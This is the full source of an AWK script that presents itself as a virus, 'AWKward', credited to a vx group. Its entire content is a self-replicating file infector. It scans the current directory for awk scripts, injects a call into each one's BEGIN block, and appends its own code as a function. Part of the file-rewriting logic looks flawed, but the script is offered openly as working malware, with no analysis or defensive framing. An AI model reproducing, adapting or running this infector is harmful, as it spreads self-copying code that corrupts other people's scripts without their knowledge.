#!/usr/bin/awk -f
# *NIX.AWKward.AWK.Perforin-vxnetw0rk - Infecting AWK files in current directory by prepending code
BEGIN {
	command1 = "ls -la -I awkward.awk| grep '^-' | awk '$5 > 0 {print $9}'"
	command2 = "awk 'END {print NR}' .awkward.tmp"
	
	while( command1 | getline line1 > 0) {
			print line1 > ".awkward.tmp"
       }
       close(command1)
	
	system("sleep 1")
	
	command2 | getline file_c
	close(command2)
    
	for (counter=0; counter<file_c; counter++) {
			getline buffer < ".awkward.tmp"
					getline shebang < buffer
						if (shebang == "#!/usr/bin/awk" || shebang == "#!/usr/bin/awk -f") {
							check_file = "awk 'END {print NR}' " buffer 
							check_file | getline file_length
								print shebang > buffer
							for (counter2=0; counter2<file_length; counter2++) {
								getline line < buffer
									if (line == "BEGIN {") {
										sub("BEGIN {", "BEGIN { infected()", line)
									}
								print line > buffer
							}
								print "function infected() {" >> buffer
							for (counter3=0; counter3<44; counter3++) {
								getline copy < "awkward.awk"
									if (counter3 >= 3) {
										print copy >> buffer
									}
							}
										print "}" >> buffer
						} else {
							print "Not an awk script"
						}

		}
	system("rm .awkward.tmp")
}
